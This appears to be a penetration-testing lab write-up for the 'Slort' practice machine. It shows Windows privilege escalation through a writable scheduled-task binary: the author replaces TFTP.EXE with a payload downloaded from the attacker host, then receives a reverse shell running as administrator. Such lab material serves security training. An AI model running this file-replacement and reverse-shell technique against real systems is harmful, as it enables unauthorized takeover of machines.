Slort_Privilege_Escalation

Scheduled Task

---

There appears to be a scheduled task executing, C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt, with an interval of 5 minutes As the current user is able to modify the directory as well as the binary itself, this could be a privilege escalation vector if the scheduled task is running with a higher privilege.

PS C:\Backup> mv TFTP.EXE TFTP.EXE.old

Changing the name of the original binary to TFTP.EXE.old

PS C:\Backup> iwr -uri http://192.168.45.215/TFTP.EXE -OutFile .\TFTP.EXE

Delivering the payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ nnc 1234        
listening on [any] 1234 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.134.53] 64957
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
 
C:\WINDOWS\system32> whoami
 whoami
slort\administrator
 
C:\WINDOWS\system32> hostname
 hostname
slort
 
C:\WINDOWS\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.134.53
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.134.254

System Level Compromise